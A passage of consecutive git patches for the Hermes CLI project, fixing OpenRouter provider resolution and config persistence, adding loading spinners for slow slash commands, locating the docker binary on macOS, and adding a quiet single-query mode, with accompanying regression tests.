   custom endpoint ran /model openrouter:model, _resolve_openrouter_runtime
   picked up OPENAI_BASE_URL instead of the OpenRouter URL, causing model
   validation to probe the wrong API and reject valid models.

   Fix: skip OPENAI_BASE_URL when requested_provider is explicitly
   'openrouter'.

2. Provider never saved to config: _save_model_choice() could save
   config.model as a plain string. All five _model_flow_* functions then
   checked isinstance(model, dict) before writing the provider — which
   silently failed on strings. With no provider in config, auto-detection
   would pick up stale credentials (e.g. Codex desktop app) instead of
   the user's explicit choice.

   Fix: _save_model_choice() now always saves as dict format. All flow
   functions also normalize string->dict as a safety net before writing
   provider.

Adds 4 regression tests. 2873 tests pass.
---
 hermes_cli/auth.py                        |  4 +-
 hermes_cli/main.py                        | 40 +++++----
 hermes_cli/runtime_provider.py            |  7 +-
 tests/test_model_provider_persistence.py  | 99 +++++++++++++++++++++++
 tests/test_runtime_provider_resolution.py | 19 +++++
 5 files changed, 151 insertions(+), 18 deletions(-)
 create mode 100644 tests/test_model_provider_persistence.py

diff --git a/hermes_cli/auth.py b/hermes_cli/auth.py
index b7c18f92..d89eadc7 100644
--- a/hermes_cli/auth.py
+++ b/hermes_cli/auth.py
@@ -1671,11 +1671,11 @@ def _save_model_choice(model_id: str) -> None:
     from hermes_cli.config import save_config, load_config, save_env_value
 
     config = load_config()
-    # Handle both string and dict model formats
+    # Always use dict format so provider/base_url can be stored alongside
     if isinstance(config.get("model"), dict):
         config["model"]["default"] = model_id
     else:
-        config["model"] = model_id
+        config["model"] = {"default": model_id}
     save_config(config)
     save_env_value("LLM_MODEL", model_id)
 
diff --git a/hermes_cli/main.py b/hermes_cli/main.py
index 20d70fcb..21b4ec89 100644
--- a/hermes_cli/main.py
+++ b/hermes_cli/main.py
@@ -906,9 +906,11 @@ def _model_flow_openrouter(config, current_model=""):
         from hermes_cli.config import load_config, save_config
         cfg = load_config()
         model = cfg.get("model")
-        if isinstance(model, dict):
-            model["provider"] = "openrouter"
-            model["base_url"] = OPENROUTER_BASE_URL
+        if not isinstance(model, dict):
+            model = {"default": model} if model else {}
+            cfg["model"] = model
+        model["provider"] = "openrouter"
+        model["base_url"] = OPENROUTER_BASE_URL
         save_config(cfg)
         deactivate_provider()
         print(f"Default model set to: {selected} (via OpenRouter)")
@@ -1090,9 +1092,11 @@ def _model_flow_custom(config):
         # Update config and deactivate any OAuth provider
         cfg = load_config()
         model = cfg.get("model")
-        if isinstance(model, dict):
-            model["provider"] = "custom"
-            model["base_url"] = effective_url
+        if not isinstance(model, dict):
+            model = {"default": model} if model else {}
+            cfg["model"] = model
+        model["provider"] = "custom"
+        model["base_url"] = effective_url
         save_config(cfg)
         deactivate_provider()
 
@@ -1235,9 +1239,11 @@ def _model_flow_named_custom(config, provider_info):
 
         cfg = load_config()
         model = cfg.get("model")
-        if isinstance(model, dict):
-            model["provider"] = "custom"
-            model["base_url"] = base_url
+        if not isinstance(model, dict):
+            model = {"default": model} if model else {}
+            cfg["model"] = model
+        model["provider"] = "custom"
+        model["base_url"] = base_url
         save_config(cfg)
         deactivate_provider()
 
@@ -1307,9 +1313,11 @@ def _model_flow_named_custom(config, provider_info):
 
     cfg = load_config()
     model = cfg.get("model")
-    if isinstance(model, dict):
-        model["provider"] = "custom"
-        model["base_url"] = base_url
+    if not isinstance(model, dict):
+        model = {"default": model} if model else {}
+        cfg["model"] = model
+    model["provider"] = "custom"
+    model["base_url"] = base_url
     save_config(cfg)
     deactivate_provider()
 
@@ -1420,9 +1428,11 @@ def _model_flow_api_key_provider(config, provider_id, current_model=""):
         # Update config with provider and base URL
         cfg = load_config()
         model = cfg.get("model")
-        if isinstance(model, dict):
-            model["provider"] = provider_id
-            model["base_url"] = effective_base
+        if not isinstance(model, dict):
+            model = {"default": model} if model else {}
+            cfg["model"] = model
+        model["provider"] = provider_id
+        model["base_url"] = effective_base
         save_config(cfg)
         deactivate_provider()
 
diff --git a/hermes_cli/runtime_provider.py b/hermes_cli/runtime_provider.py
index bf86fa88..4e6910da 100644
--- a/hermes_cli/runtime_provider.py
+++ b/hermes_cli/runtime_provider.py
@@ -66,9 +66,14 @@ def _resolve_openrouter_runtime(
             if not cfg_provider or cfg_provider == "auto":
                 use_config_base_url = True
 
+    # When the user explicitly requested the openrouter provider, skip
+    # OPENAI_BASE_URL — it typically points to a custom / non-OpenRouter
+    # endpoint and would prevent switching back to OpenRouter (#874).
+    skip_openai_base = requested_norm == "openrouter"
+
     base_url = (
         (explicit_base_url or "").strip()
-        or env_openai_base_url
+        or ("" if skip_openai_base else env_openai_base_url)
         or (cfg_base_url.strip() if use_config_base_url else "")
         or env_openrouter_base_url
         or OPENROUTER_BASE_URL
diff --git a/tests/test_model_provider_persistence.py b/tests/test_model_provider_persistence.py
new file mode 100644
index 00000000..026715bf
--- /dev/null
+++ b/tests/test_model_provider_persistence.py
@@ -0,0 +1,99 @@
+"""Tests that provider selection via `hermes model` always persists correctly.
+
+Regression tests for the bug where _save_model_choice could save config.model
+as a plain string, causing subsequent provider writes (which check
+isinstance(model, dict)) to silently fail — leaving the provider unset and
+falling back to auto-detection.
+"""
+
+import os
+from unittest.mock import patch, MagicMock
+
+import pytest
+
+
+@pytest.fixture
+def config_home(tmp_path, monkeypatch):
+    """Isolated HERMES_HOME with a minimal string-format config."""
+    home = tmp_path / "hermes"
+    home.mkdir()
+    config_yaml = home / "config.yaml"
+    # Start with model as a plain string — the format that triggered the bug
+    config_yaml.write_text("model: some-old-model\n")
+    env_file = home / ".env"
+    env_file.write_text("")
+    monkeypatch.setenv("HERMES_HOME", str(home))
+    # Clear env vars that could interfere
+    monkeypatch.delenv("HERMES_MODEL", raising=False)
+    monkeypatch.delenv("LLM_MODEL", raising=False)
+    monkeypatch.delenv("HERMES_INFERENCE_PROVIDER", raising=False)
+    monkeypatch.delenv("OPENAI_BASE_URL", raising=False)
+    monkeypatch.delenv("OPENAI_API_KEY", raising=False)
+    monkeypatch.delenv("OPENROUTER_API_KEY", raising=False)
+    return home
+
+
+class TestSaveModelChoiceAlwaysDict:
+    def test_string_model_becomes_dict(self, config_home):
+        """When config.model is a plain string, _save_model_choice must
+        convert it to a dict so provider can be set afterwards."""
+        from hermes_cli.auth import _save_model_choice
+
+        _save_model_choice("kimi-k2.5")
+
+        import yaml
+        config = yaml.safe_load((config_home / "config.yaml").read_text()) or {}
+        model = config.get("model")
+        assert isinstance(model, dict), (
+            f"Expected model to be a dict after save, got {type(model)}: {model}"
+        )
+        assert model["default"] == "kimi-k2.5"
+
+    def test_dict_model_stays_dict(self, config_home):
+        """When config.model is already a dict, _save_model_choice preserves it."""
+        import yaml
+        (config_home / "config.yaml").write_text(
+            "model:\n  default: old-model\n  provider: openrouter\n"
+        )
+        from hermes_cli.auth import _save_model_choice
+
+        _save_model_choice("new-model")
+
+        config = yaml.safe_load((config_home / "config.yaml").read_text()) or {}
+        model = config.get("model")
+        assert isinstance(model, dict)
+        assert model["default"] == "new-model"
+        assert model["provider"] == "openrouter"  # preserved
+
+
+class TestProviderPersistsAfterModelSave:
+    def test_api_key_provider_saved_when_model_was_string(self, config_home, monkeypatch):
+        """_model_flow_api_key_provider must persist the provider even when
+        config.model started as a plain string."""
+        from hermes_cli.auth import PROVIDER_REGISTRY
+
+        pconfig = PROVIDER_REGISTRY.get("kimi-coding")
+        if not pconfig:
+            pytest.skip("kimi-coding not in PROVIDER_REGISTRY")
+
+        # Simulate: user has a Kimi API key, model was a string
+        monkeypatch.setenv("KIMI_API_KEY", "sk-kimi-test-key")
+
+        from hermes_cli.main import _model_flow_api_key_provider
+        from hermes_cli.config import load_config
+
+        # Mock the model selection prompt to return "kimi-k2.5"
+        # Also mock input() for the base URL prompt and builtins.input
+        with patch("hermes_cli.auth._prompt_model_selection", return_value="kimi-k2.5"), \
+             patch("hermes_cli.auth.deactivate_provider"), \
+             patch("builtins.input", return_value=""):
+            _model_flow_api_key_provider(load_config(), "kimi-coding", "old-model")
+
+        import yaml
+        config = yaml.safe_load((config_home / "config.yaml").read_text()) or {}
+        model = config.get("model")
+        assert isinstance(model, dict), f"model should be dict, got {type(model)}"
+        assert model.get("provider") == "kimi-coding", (
+            f"provider should be 'kimi-coding', got {model.get('provider')}"
+        )
+        assert model.get("default") == "kimi-k2.5"
diff --git a/tests/test_runtime_provider_resolution.py b/tests/test_runtime_provider_resolution.py
index 031457a5..9ccd7c7e 100644
--- a/tests/test_runtime_provider_resolution.py
+++ b/tests/test_runtime_provider_resolution.py
@@ -181,6 +181,25 @@ def test_resolve_runtime_provider_nous_api(monkeypatch):
     assert resolved["requested_provider"] == "nous-api"
 
 
+def test_explicit_openrouter_skips_openai_base_url(monkeypatch):
+    """When the user explicitly requests openrouter, OPENAI_BASE_URL
+    (which may point to a custom endpoint) must not override the
+    OpenRouter base URL.  Regression test for #874."""
+    monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "openrouter")
+    monkeypatch.setattr(rp, "_get_model_config", lambda: {})
+    monkeypatch.setenv("OPENAI_BASE_URL", "https://my-custom-llm.example.com/v1")
+    monkeypatch.setenv("OPENROUTER_API_KEY", "or-test-key")
+    monkeypatch.delenv("OPENROUTER_BASE_URL", raising=False)
+    monkeypatch.delenv("OPENAI_API_KEY", raising=False)
+
+    resolved = rp.resolve_runtime_provider(requested="openrouter")
+
+    assert resolved["provider"] == "openrouter"
+    assert "openrouter.ai" in resolved["base_url"]
+    assert "my-custom-llm" not in resolved["base_url"]
+    assert resolved["api_key"] == "or-test-key"
+
+
 def test_resolve_requested_provider_precedence(monkeypatch):
     monkeypatch.setenv("HERMES_INFERENCE_PROVIDER", "nous")
     monkeypatch.setattr(rp, "_get_model_config", lambda: {"provider": "openai-codex"})

From d502952bace229883c077b2e88f562d201e7a8de Mon Sep 17 00:00:00 2001
From: vilkasdev <vilkasdev@users.noreply.github.com>
Date: Tue, 10 Mar 2026 17:13:14 -0700
Subject: [PATCH 040/105] fix(cli): add loading indicators for slow slash
 commands

Shows an immediate status message and braille spinner for slow slash
commands (/skills search|browse|inspect|install, /reload-mcp). Makes
input read-only while the command runs so the CLI doesn't appear frozen.

Cherry-picked from PR #714 by vilkasdev, rebased onto current main
with conflict resolution and bug fix (get_hint_text duplicate return).

Fixes #636

Co-authored-by: vilkasdev <vilkasdev@users.noreply.github.com>
---
 cli.py                              | 84 +++++++++++++++++++++++++++--
 tests/test_cli_loading_indicator.py | 65 ++++++++++++++++++++++
 2 files changed, 145 insertions(+), 4 deletions(-)
 create mode 100644 tests/test_cli_loading_indicator.py

diff --git a/cli.py b/cli.py
index 357a3759..fc1f9f82 100755
--- a/cli.py
+++ b/cli.py
@@ -20,6 +20,7 @@ import json
 import atexit
 import uuid
 import textwrap
+from contextlib import contextmanager
 from pathlib import Path
 from datetime import datetime
 from typing import List, Dict, Any, Optional
@@ -54,6 +55,8 @@ except (ImportError, AttributeError):
 import threading
 import queue
 
+_COMMAND_SPINNER_FRAMES = ("⠋", "⠙", "⠹", "⠸", "⠼", "⠴", "⠦", "⠧", "⠇", "⠏")
+
 
 # Load .env from ~/.hermes/.env first, then project root as dev fallback
 from dotenv import load_dotenv
@@ -1237,6 +1240,8 @@ class HermesCLI:
         self._history_file = Path.home() / ".hermes_history"
         self._last_invalidate: float = 0.0  # throttle UI repaints
         self._spinner_text: str = ""  # thinking spinner text for TUI
+        self._command_running = False
+        self._command_status = ""
 
     def _invalidate(self, min_interval: float = 0.25) -> None:
         """Throttled UI repaint — prevents terminal blinking on slow/SSH connections."""
@@ -1305,6 +1310,44 @@ class HermesCLI:
         self._spinner_text = text or ""
         self._invalidate()
 
+    def _slow_command_status(self, command: str) -> str:
+        """Return a user-facing status message for slower slash commands."""
+        cmd_lower = command.lower().strip()
+        if cmd_lower.startswith("/skills search"):
+            return "Searching skills..."
+        if cmd_lower.startswith("/skills browse"):
+            return "Loading skills..."
+        if cmd_lower.startswith("/skills inspect"):
+            return "Inspecting skill..."
+        if cmd_lower.startswith("/skills install"):
+            return "Installing skill..."
+        if cmd_lower.startswith("/skills"):
+            return "Processing skills command..."
+        if cmd_lower == "/reload-mcp":
+            return "Reloading MCP servers..."
+        return "Processing command..."
+
+    def _command_spinner_frame(self) -> str:
+        """Return the current spinner frame for slow slash commands."""
+        import time as _time
+
+        frame_idx = int(_time.monotonic() * 10) % len(_COMMAND_SPINNER_FRAMES)
+        return _COMMAND_SPINNER_FRAMES[frame_idx]
+
+    @contextmanager
+    def _busy_command(self, status: str):
+        """Expose a temporary busy state in the TUI while a slash command runs."""
+        self._command_running = True
+        self._command_status = status
+        self._invalidate(min_interval=0.0)
+        try:
+            print(f"⏳ {status}")
+            yield
+        finally:
+            self._command_running = False
+            self._command_status = ""
+            self._invalidate(min_interval=0.0)
+
     def _ensure_runtime_credentials(self) -> bool:
         """
         Ensure runtime credentials are resolved before agent use.
@@ -2758,7 +2801,8 @@ class HermesCLI:
         elif cmd_lower.startswith("/cron"):
             self._handle_cron_command(cmd_original)
         elif cmd_lower.startswith("/skills"):
-            self._handle_skills_command(cmd_original)
+            with self._busy_command(self._slow_command_status(cmd_original)):
+                self._handle_skills_command(cmd_original)
         elif cmd_lower == "/platforms" or cmd_lower == "/gateway":
             self._show_gateway_status()
         elif cmd_lower == "/verbose":
@@ -2772,7 +2816,8 @@ class HermesCLI:
         elif cmd_lower == "/paste":
             self._handle_paste_command()
         elif cmd_lower == "/reload-mcp":
-            self._reload_mcp()
+            with self._busy_command(self._slow_command_status(cmd_original)):
+                self._reload_mcp()
         elif cmd_lower.startswith("/rollback"):
             self._handle_rollback_command(cmd_original)
         elif cmd_lower.startswith("/skin"):
@@ -2981,7 +3026,8 @@ class HermesCLI:
             with _lock:
                 old_servers = set(_servers.keys())
 
-            print("🔄 Reloading MCP servers...")
+            if not self._command_running:
+                print("🔄 Reloading MCP servers...")
 
             # Shutdown existing connections
             shutdown_mcp_servers()
@@ -3441,6 +3487,10 @@ class HermesCLI:
         self._approval_state = None     # dict with command, description, choices, selected, response_queue
         self._approval_deadline = 0
 
+        # Slash command loading state
+        self._command_running = False
+        self._command_status = ""
+
         # Clipboard image attachments (paste images into the CLI)
         self._attached_images: list[Path] = []
         self._image_counter = 0
@@ -3713,6 +3763,8 @@ class HermesCLI:
                 return [('class:clarify-selected', '✎ ❯ ')]
             if cli_ref._clarify_state:
                 return [('class:prompt-working', '? ❯ ')]
+            if cli_ref._command_running:
+                return [('class:prompt-working', f"{cli_ref._command_spinner_frame()} ❯ ")]
             if cli_ref._agent_running:
                 return [('class:prompt-working', '⚕ ❯ ')]
             return [('class:prompt', '❯ ')]
@@ -3724,6 +3776,7 @@ class HermesCLI:
             style='class:input-area',
             multiline=True,
             wrap_lines=True,
+            read_only=Condition(lambda: bool(cli_ref._command_running)),
             history=FileHistory(str(self._history_file)),
             completer=SlashCommandCompleter(skill_commands_provider=lambda: _skill_commands),
             complete_while_typing=True,
@@ -3808,6 +3861,10 @@ class HermesCLI:
                 return "type your answer here and press Enter"
             if cli_ref._clarify_state:
                 return ""
+            if cli_ref._command_running:
+                frame = cli_ref._command_spinner_frame()
+                status = cli_ref._command_status or "Processing command..."
+                return f"{frame} {status}"
             if cli_ref._agent_running:
                 return "type a message + Enter to interrupt, Ctrl+C to cancel"
             return ""
@@ -3847,10 +3904,16 @@ class HermesCLI:
                     ('class:clarify-countdown', countdown),
                 ]
 
+            if cli_ref._command_running:
+                frame = cli_ref._command_spinner_frame()
+                return [
+                    ('class:hint', f'  {frame} command in progress · input temporarily disabled'),
+                ]
+
             return []
 
         def get_hint_height():
-            if cli_ref._sudo_state or cli_ref._approval_state or cli_ref._clarify_state:
+            if cli_ref._sudo_state or cli_ref._approval_state or cli_ref._clarify_state or cli_ref._command_running:
                 return 1
             # Keep a 1-line spacer while agent runs so output doesn't push
             # right up against the top rule of the input area
@@ -4160,6 +4223,19 @@ class HermesCLI:
             **({'cursor': _STEADY_CURSOR} if _STEADY_CURSOR is not None else {}),
         )
         self._app = app  # Store reference for clarify_callback
+
+        def spinner_loop():
+            import time as _time
+
+            while not self._should_exit:
+                if self._command_running and self._app:
+                    self._invalidate(min_interval=0.1)
+                    _time.sleep(0.1)
+                else:
+                    _time.sleep(0.05)
+
+        spinner_thread = threading.Thread(target=spinner_loop, daemon=True)
+        spinner_thread.start()
         
         # Background thread to process inputs and run agent
         def process_loop():
diff --git a/tests/test_cli_loading_indicator.py b/tests/test_cli_loading_indicator.py
new file mode 100644
index 00000000..6cec9eca
--- /dev/null
+++ b/tests/test_cli_loading_indicator.py
@@ -0,0 +1,65 @@
+"""Regression tests for loading feedback on slow slash commands."""
+
+from unittest.mock import patch
+
+from cli import HermesCLI
+
+
+class TestCLILoadingIndicator:
+    def _make_cli(self):
+        cli_obj = HermesCLI.__new__(HermesCLI)
+        cli_obj._app = None
+        cli_obj._last_invalidate = 0.0
+        cli_obj._command_running = False
+        cli_obj._command_status = ""
+        return cli_obj
+
+    def test_skills_command_sets_busy_state_and_prints_status(self, capsys):
+        cli_obj = self._make_cli()
+        seen = {}
+
+        def fake_handle(cmd: str):
+            seen["cmd"] = cmd
+            seen["running"] = cli_obj._command_running
+            seen["status"] = cli_obj._command_status
+            print("skills done")
+
+        with patch.object(cli_obj, "_handle_skills_command", side_effect=fake_handle), \
+             patch.object(cli_obj, "_invalidate") as invalidate_mock:
+            assert cli_obj.process_command("/skills search kubernetes")
+
+        output = capsys.readouterr().out
+        assert "⏳ Searching skills..." in output
+        assert "skills done" in output
+        assert seen == {
+            "cmd": "/skills search kubernetes",
+            "running": True,
+            "status": "Searching skills...",
+        }
+        assert cli_obj._command_running is False
+        assert cli_obj._command_status == ""
+        assert invalidate_mock.call_count == 2
+
+    def test_reload_mcp_sets_busy_state_and_prints_status(self, capsys):
+        cli_obj = self._make_cli()
+        seen = {}
+
+        def fake_reload():
+            seen["running"] = cli_obj._command_running
+            seen["status"] = cli_obj._command_status
+            print("reload done")
+
+        with patch.object(cli_obj, "_reload_mcp", side_effect=fake_reload), \
+             patch.object(cli_obj, "_invalidate") as invalidate_mock:
+            assert cli_obj.process_command("/reload-mcp")
+
+        output = capsys.readouterr().out
+        assert "⏳ Reloading MCP servers..." in output
+        assert "reload done" in output
+        assert seen == {
+            "running": True,
+            "status": "Reloading MCP servers...",
+        }
+        assert cli_obj._command_running is False
+        assert cli_obj._command_status == ""
+        assert invalidate_mock.call_count == 2

From 24479625a2e94a79d831baf2e9255fec0f4c782e Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 20:45:13 -0700
Subject: [PATCH 041/105] fix: Docker backend fails when docker is not in PATH
 (macOS gateway)

On macOS, Docker Desktop installs the CLI to /usr/local/bin/docker, but
when Hermes runs as a gateway service (launchd) or in other non-login
contexts, /usr/local/bin is often not in PATH. This causes the Docker
requirements check to fail with 'No such file or directory: docker' even
though docker works fine from the user's terminal.

Add find_docker() helper that uses shutil.which() first, then probes
common Docker Desktop install paths on macOS (/usr/local/bin,
/opt/homebrew/bin, Docker.app bundle). The resolved path is cached and
passed to mini-swe-agent via its 'executable' parameter.

- tools/environments/docker.py: add find_docker(), use it in
  _storage_opt_supported() and pass to _Docker(executable=...)
- tools/terminal_tool.py: use find_docker() in requirements check
- tests/tools/test_docker_find.py: 4 tests (PATH, fallback, not found, cache)

2877 tests pass.
---
 tests/tools/test_docker_find.py | 48 +++++++++++++++++++++++++++++++
 tools/environments/docker.py    | 51 +++++++++++++++++++++++++++++++--
 tools/terminal_tool.py          |  9 ++++--
 3 files changed, 103 insertions(+), 5 deletions(-)
 create mode 100644 tests/tools/test_docker_find.py

diff --git a/tests/tools/test_docker_find.py b/tests/tools/test_docker_find.py
new file mode 100644
index 00000000..c1fb58a3
--- /dev/null
+++ b/tests/tools/test_docker_find.py
@@ -0,0 +1,48 @@
+"""Tests for tools.environments.docker.find_docker — Docker CLI discovery."""
+
+import os
+from unittest.mock import patch
+
+import pytest
+
+from tools.environments import docker as docker_mod
+
+
+@pytest.fixture(autouse=True)
+def _reset_cache():
+    """Clear the module-level docker executable cache between tests."""
+    docker_mod._docker_executable = None
+    yield
+    docker_mod._docker_executable = None
+
+
+class TestFindDocker:
+    def test_found_via_shutil_which(self):
+        with patch("tools.environments.docker.shutil.which", return_value="/usr/bin/docker"):
+            result = docker_mod.find_docker()
+        assert result == "/usr/bin/docker"
+
+    def test_not_in_path_falls_back_to_known_locations(self, tmp_path):
+        # Create a fake docker binary at a known path
+        fake_docker = tmp_path / "docker"
+        fake_docker.write_text("#!/bin/sh\n")
+        fake_docker.chmod(0o755)
+
+        with patch("tools.environments.docker.shutil.which", return_value=None), \
+             patch("tools.environments.docker._DOCKER_SEARCH_PATHS", [str(fake_docker)]):
+            result = docker_mod.find_docker()
+        assert result == str(fake_docker)
+
+    def test_returns_none_when_not_found(self):
+        with patch("tools.environments.docker.shutil.which", return_value=None), \
+             patch("tools.environments.docker._DOCKER_SEARCH_PATHS", ["/nonexistent/docker"]):
+            result = docker_mod.find_docker()
+        assert result is None
+
+    def test_caches_result(self):
+        with patch("tools.environments.docker.shutil.which", return_value="/usr/local/bin/docker"):
+            first = docker_mod.find_docker()
+        # Second call should use cache, not call shutil.which again
+        with patch("tools.environments.docker.shutil.which", return_value=None):
+            second = docker_mod.find_docker()
+        assert first == second == "/usr/local/bin/docker"
diff --git a/tools/environments/docker.py b/tools/environments/docker.py
index 6b380b31..496b41d3 100644
--- a/tools/environments/docker.py
+++ b/tools/environments/docker.py
@@ -7,6 +7,7 @@ persistence via bind mounts.
 
 import logging
 import os
+import shutil
 import subprocess
 import sys
 import threading
@@ -19,6 +20,44 @@ from tools.interrupt import is_interrupted
 logger = logging.getLogger(__name__)
 
 
+# Common Docker Desktop install paths checked when 'docker' is not in PATH.
+# macOS Intel: /usr/local/bin, macOS Apple Silicon (Homebrew): /opt/homebrew/bin,
+# Docker Desktop app bundle: /Applications/Docker.app/Contents/Resources/bin
+_DOCKER_SEARCH_PATHS = [
+    "/usr/local/bin/docker",
+    "/opt/homebrew/bin/docker",
+    "/Applications/Docker.app/Contents/Resources/bin/docker",
+]
+
+_docker_executable: Optional[str] = None  # resolved once, cached
+
+
+def find_docker() -> Optional[str]:
+    """Locate the docker CLI binary.
+
+    Checks ``shutil.which`` first (respects PATH), then probes well-known
+    install locations on macOS where Docker Desktop may not be in PATH
+    (e.g. when running as a gateway service via launchd).
+
+    Returns the absolute path, or ``None`` if docker cannot be found.
+    """
+    global _docker_executable
+    if _docker_executable is not None:
+        return _docker_executable
+
+    found = shutil.which("docker")
+    if found:
+        _docker_executable = found
+        return found
+
+    for path in _DOCKER_SEARCH_PATHS:
+        if os.path.isfile(path) and os.access(path, os.X_OK):
+            _docker_executable = path
+            logger.info("Found docker at non-PATH location: %s", path)
+            return path
+
+    return None
+
 
 # Security flags applied to every container.
 # The container itself is the security boundary (isolated from host).
@@ -145,9 +184,14 @@ class DockerEnvironment(BaseEnvironment):
         all_run_args = list(_SECURITY_ARGS) + writable_args + resource_args + volume_args
         logger.info(f"Docker run_args: {all_run_args}")
 
+        # Resolve the docker executable once so it works even when
+        # /usr/local/bin is not in PATH (common on macOS gateway/service).
+        docker_exe = find_docker() or "docker"
+
         self._inner = _Docker(
             image=image, cwd=cwd, timeout=timeout,
             run_args=all_run_args,
+            executable=docker_exe,
         )
         self._container_id = self._inner.container_id
 
@@ -162,8 +206,9 @@ class DockerEnvironment(BaseEnvironment):
         if _storage_opt_ok is not None:
             return _storage_opt_ok
         try:
+            docker = find_docker() or "docker"
             result = subprocess.run(
-                ["docker", "info", "--format", "{{.Driver}}"],
+                [docker, "info", "--format", "{{.Driver}}"],
                 capture_output=True, text=True, timeout=10,
             )
             driver = result.stdout.strip().lower()
@@ -173,14 +218,14 @@ class DockerEnvironment(BaseEnvironment):
             # overlay2 only supports storage-opt on XFS with pquota.
             # Probe by attempting a dry-ish run — the fastest reliable check.
             probe = subprocess.run(
-                ["docker", "create", "--storage-opt", "size=1m", "hello-world"],
+                [docker, "create", "--storage-opt", "size=1m", "hello-world"],
                 capture_output=True, text=True, timeout=15,
             )
             if probe.returncode == 0:
                 # Clean up the created container
                 container_id = probe.stdout.strip()
                 if container_id:
-                    subprocess.run(["docker", "rm", container_id],
+                    subprocess.run([docker, "rm", container_id],
                                    capture_output=True, timeout=5)
                 _storage_opt_ok = True
             else:
diff --git a/tools/terminal_tool.py b/tools/terminal_tool.py
index f6399fca..b8c3a66f 100644
--- a/tools/terminal_tool.py
+++ b/tools/terminal_tool.py
@@ -1112,9 +1112,14 @@ def check_terminal_requirements() -> bool:
             return True
         elif env_type == "docker":
             from minisweagent.environments.docker import DockerEnvironment
-            # Check if docker is available
+            # Check if docker is available (use find_docker for macOS PATH issues)
+            from tools.environments.docker import find_docker
             import subprocess
-            result = subprocess.run(["docker", "version"], capture_output=True, timeout=5)
+            docker = find_docker()
+            if not docker:
+                logger.error("Docker executable not found in PATH or common install locations")
+                return False
+            result = subprocess.run([docker, "version"], capture_output=True, timeout=5)
             return result.returncode == 0
         elif env_type == "singularity":
             from minisweagent.environments.singularity import SingularityEnvironment

From 23270d41b947acec24bc7a022e7c004dc2a7f23c Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 20:45:18 -0700
Subject: [PATCH 042/105] feat: add --quiet/-Q flag for programmatic
 single-query mode
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Adds -Q/--quiet to `hermes chat` for use by external orchestrators
(Paperclip, scripts, CI). When combined with -q, suppresses:
- Banner and ASCII art
- Spinner animations
- Tool preview lines (┊ prefix)

Only outputs:
- The agent's final response text
- A parseable 'session_id: <id>' line for session resumption

Usage: hermes chat -q 'Do something' -Q
Used by: Paperclip adapter (@nousresearch/paperclip-adapter-hermes)
---
 cli.py             | 22 ++++++++++++++++++----
 hermes_cli/main.py |  6 ++++++
 2 files changed, 24 insertions(+), 4 deletions(-)

diff --git a/cli.py b/cli.py
index fc1f9f82..aa98de5a 100755
--- a/cli.py
+++ b/cli.py
@@ -4356,6 +4356,7 @@ def main(
     base_url: str = None,
     max_turns: int = None,
     verbose: bool = False,
+    quiet: bool = False,
     compact: bool = False,
     list_tools: bool = False,
     list_toolsets: bool = False,
@@ -4498,10 +4499,23 @@ def main(
     
     # Handle single query mode
     if query:
-        cli.show_banner()
-        cli.console.print(f"[bold blue]Query:[/] {query}")
-        cli.chat(query)
-        cli._print_exit_summary()
+        if quiet:
+            # Quiet mode: suppress banner, spinner, tool previews.
+            # Only print the final response and parseable session info.
+            cli.tool_progress_mode = "off"
+            cli.agent = cli._init_agent()
+            if cli.agent:
+                cli.agent.quiet_mode = True
+                result = cli.agent.run_conversation(query)
+                response = result.get("final_response", "") if isinstance(result, dict) else str(result)
+                if response:
+                    print(response)
+                print(f"\nsession_id: {cli.session_id}")
+        else:
+            cli.show_banner()
+            cli.console.print(f"[bold blue]Query:[/] {query}")
+            cli.chat(query)
+            cli._print_exit_summary()
         return
     
     # Run interactive mode
diff --git a/hermes_cli/main.py b/hermes_cli/main.py
index 21b4ec89..031acba7 100644
--- a/hermes_cli/main.py
+++ b/hermes_cli/main.py
@@ -486,6 +486,7 @@ def cmd_chat(args):
         "provider": getattr(args, "provider", None),
         "toolsets": args.toolsets,
         "verbose": args.verbose,
+        "quiet": getattr(args, "quiet", False),
         "query": args.query,
         "resume": getattr(args, "resume", None),
         "worktree": getattr(args, "worktree", False),
@@ -1918,6 +1919,11 @@ For more help on a command:
         action="store_true",
         help="Verbose output"
     )
+    chat_parser.add_argument(
+        "-Q", "--quiet",
+        action="store_true",
+        help="Quiet mode for programmatic use: suppress banner, spinner, and tool previews. Only output the final response and session info."
+    )
     chat_parser.add_argument(
         "--resume", "-r",
         metavar="SESSION_ID",

From 2d80ef78722f6e8a25d9fc65e7218e505c02dc73 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 20:48:58 -0700
Subject: [PATCH 043/105] =?UTF-8?q?fix:=20=5Finit=5Fagent=20returns=20bool?=
 =?UTF-8?q?,=20not=20agent=20=E2=80=94=20fix=20quiet=20mode=20crash?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cli.py | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/cli.py b/cli.py
index aa98de5a..a2a3f8c1 100755
--- a/cli.py
+++ b/cli.py
@@ -4503,8 +4503,7 @@ def main(
             # Quiet mode: suppress banner, spinner, tool previews.
             # Only print the final response and parseable session info.
             cli.tool_progress_mode = "off"
-            cli.agent = cli._init_agent()
-            if cli.agent:
+            if cli._init_agent():
                 cli.agent.quiet_mode = True
                 result = cli.agent.run_conversation(query)
                 response = result.get("final_response", "") if isinstance(result, dict) else str(result)

From 67b94702075acb586c8666ce6741a47c62f552eb Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Tue, 10 Mar 2026 23:16:49 -0700
Subject: [PATCH 044/105] fix: reduce premature gateway compression on
 tool-heavy sessions
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

The gateway's session hygiene pre-check uses a rough char-based token
estimate (total_chars / 4) to decide whether to compress before the
agent starts. This significantly overestimates for tool-heavy and
code-heavy conversations because:

1. str(msg) on dicts includes Python repr overhead (keys, brackets, etc.)
2. Code/JSON tokenizes at 5-7+ chars/token, not the assumed 4

This caused users with 200k context to see compression trigger at
~100-113k actual tokens instead of the expected 170k (85% threshold).
Reported by TigerHix on Twitter.

Fix: apply a 1.4x safety factor to the gateway pre-check threshold.
This pre-check is only meant to catch pathologically large transcripts
